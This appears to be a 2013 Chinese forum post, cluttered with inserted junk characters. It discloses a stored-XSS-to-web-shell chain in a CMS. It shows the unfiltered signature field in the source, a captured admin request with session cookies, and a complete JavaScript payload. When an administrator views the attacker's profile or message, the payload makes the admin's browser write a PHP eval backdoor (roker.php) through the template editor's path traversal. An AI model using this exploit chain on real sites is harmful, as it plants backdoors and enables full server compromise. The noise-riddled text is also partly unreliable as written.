|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题* C4 S9 R3 c% V" w# v3 Y8 ]9 s
官网已经修补了,所以重新下了源码
. v1 Z k# Z' z& Z因为 后台登入 还需要认证码 所以 注入就没看了。
|, i$ l3 v5 K存在 xss
6 }3 x A3 J# I漏洞文件 user/member/skin_edit.php
! h8 g$ E" E; K5 s) ^. C本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# U$ }: l6 c; h/ h9 l
, @0 {& v$ m8 x8 a! c$ t9 \2 Y
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>, Q& i" e+ R" A( x0 c
; A7 P5 I6 ?8 k* u+ f9 X</textarea></td></tr>
4 D" `0 X& K) m8 ?0 ~5 i 1 R) g1 p8 x0 P6 e1 k M8 X
user/do.php 8 o# @& q5 A/ z9 _4 d
3 g f! F# q6 m. o+ z+ Q
9 N( }' t! n1 X3 R! H! Gif($op=='zl'){ //资料
4 J5 U2 p+ p, |: n7 P, R$ E0 |
! \' ?3 m9 t" u! G9 C if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
7 j2 ~" H$ x5 [9 X( z, q& N exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
^8 J& O4 N' y: m
2 V8 g- x4 g. } Z' Y* E $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 f4 G9 ^# H4 X& M
) D& |% A" N' ?; | CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'1 L6 O$ L- u; D T- R7 }
where CS_Name='".$cscms_name."'";
) A2 a5 I- Z' \! ^* w% g+ V! J
! z: q w5 t8 Z8 D if($db->query($sql)){
' _1 \1 U- ~8 r, x
2 X! b, j2 ]3 ?- d: Z exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: K6 ~: i3 ]" E7 e+ Q1 m* v 6 F' A+ l# c: \6 G0 L- o9 a. q
}else{
2 J" A% N, x+ J5 a0 U 2 y2 O, W& C# C8 Y! M1 E
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
( i& y7 e4 h6 Q1 j
$ Z. ^' I! G9 m& H }
) m: H& f! r$ D+ I4 `. q+ v, _) n: {6 k
0 |% U! \. D& \& V: I6 @* p$ Z没有 过滤导致xss产生。" w% ?& q+ F$ \: k! H2 Q! B& J& Z
后台 看了下 很奇葩的是可以写任意格式文件。。9 i- I9 h% y3 f4 q' S- k+ e
抓包。。- }' k* ?0 ]- t5 s1 H
* g1 m# m% Y$ {3 d
# E4 I& U$ K+ s本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
* f. N2 ~1 G$ O! [ ( o, [* Q* J% R% A
Accept: text/html, application/xhtml+xml, */*( o5 m! j( }7 z9 e- x" l
6 U/ v1 P( t0 d5 gReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php# x+ P" _6 u* M# r
9 j% E' `+ i# F5 t( e) |1 ]
Accept-Language: zh-CN. \8 L, L) G5 D* x8 k7 t3 r) ^
( y, X+ D) g* U) U7 N& n# ]
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 M- ?1 K0 ~) ^) B P
6 F* g0 P2 L! _( h; K+ @Content-Type: application/x-www-form-urlencoded+ Y7 {* o. Z( c( x8 ^; Q
7 {* E5 p3 w0 p
Accept-Encoding: gzip, deflate, v5 ~( l4 k4 l' p4 }9 E `3 F, B
9 h& t6 P9 A- L3 M& y
Host: 127.0.0.1
, n: l( l0 E6 X9 @3 |( C 5 _' P- t3 p4 [/ x7 u
Content-Length: 38
4 X8 B# {& V& b. F$ l1 E
7 N- r4 E r4 a4 @/ d7 mDNT: 1
% w+ s: W9 Y# t8 i0 L% |8 T 2 G# P0 J7 g4 O {1 J) @
Connection: Keep-Alive
( U! @; [( r" U ; j M3 W8 n* i5 S( E+ F
Cache-Control: no-cache
5 j, i b& g1 a) C 9 b& c# \3 S i$ |
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
( t$ x& V* d- F+ F# T7 m' L
$ o7 W5 R# k' r0 u. H# E0 q3 y9 N7 C" L8 a7 \ B* x
name=aaa.php&content=%3Cs%3E%3Ca%25%3E: l' ]' R9 z3 i) p
1 O' M# `. d- L2 R( O- T' N
5 E6 z0 H1 q- F& m: c4 X: V( ]. \: i- b
于是 构造js如下。
9 O1 R% p9 A8 r, X6 i
9 ]2 D" X& t7 L2 W本帖隐藏的内容<script> % n% y8 a8 \9 m r
thisTHost = top.location.hostname;3 x, r/ J4 i" k
: {0 H! }3 }# l8 w3 C) B" ^& [9 `
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' `! q- u. T2 q
6 s E% k4 A' z# w% C6 jfunction PostSubmit(url, data, msg) { ; Z/ U, K' o; N$ r! V* e3 X
var postUrl = url;
0 c& t1 O' o; K# y3 n* p/ n
$ b ?* S( t0 k3 ^ var postData = data;
) s$ \: L1 Y+ S" ?5 m/ O5 W var msgData = msg; % l! W( _* N$ l6 F: H4 n5 z
var ExportForm = document.createElement("FORM");
7 ]- ]" T" V. e8 u: G document.body.appendChild(ExportForm);
* A( G3 E9 F7 l. f ExportForm.method = "POST"; * U/ u2 U- v* y l( r
var newElement = document.createElement("input"); ) \' H5 ?/ |% F$ P. R% C
newElement.setAttribute("name", "name"); . [4 n" P$ b9 x0 | F T1 v9 [6 ]9 U
newElement.setAttribute("type", "hidden");
, B! n/ n6 f# t var newElement2 = document.createElement("input");
2 `+ B2 U$ e( |# T8 a newElement2.setAttribute("name", "content"); % g; I; T t$ @5 o1 J$ M( a+ w
newElement2.setAttribute("type", "hidden");
& P2 c1 a8 O5 G+ ~8 Z! i ExportForm.appendChild(newElement);
# j+ \% w, n! K4 J ExportForm.appendChild(newElement2); 5 [6 k( l) O" p, O9 |
newElement.value = postData;
; ?8 c2 t$ j7 Y9 n$ y6 F6 D* F( L newElement2.value = msgData;
) `. ]. n& ^' w. L9 m7 h7 _3 Z ExportForm.action = postUrl;
, P0 E7 x' v# G" J6 C( h9 a) \ ExportForm.submit(); W) b1 r& N' j- ?2 B
};
$ L# A; w4 k ?; f5 H' k$ N ' x g" ~& N z4 Y' f
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* n2 G5 {* Q7 w- s0 @$ \
( z( Q& B: }, ~: i2 K2 j( B) Y</script>
9 f1 b" R$ @3 n! ~9 ~% a9 M
, k* }# r3 M0 X/ t. M; ^6 x+ T# u; |2 _9 R9 ^0 T8 G
3 R/ y3 J5 g7 L j
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
# w: ~. D7 k& x3 R% H用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
, ?6 ^0 l1 g+ ?就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
. O& [% E1 b$ ?. Y2 O, C! r( d8 l |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对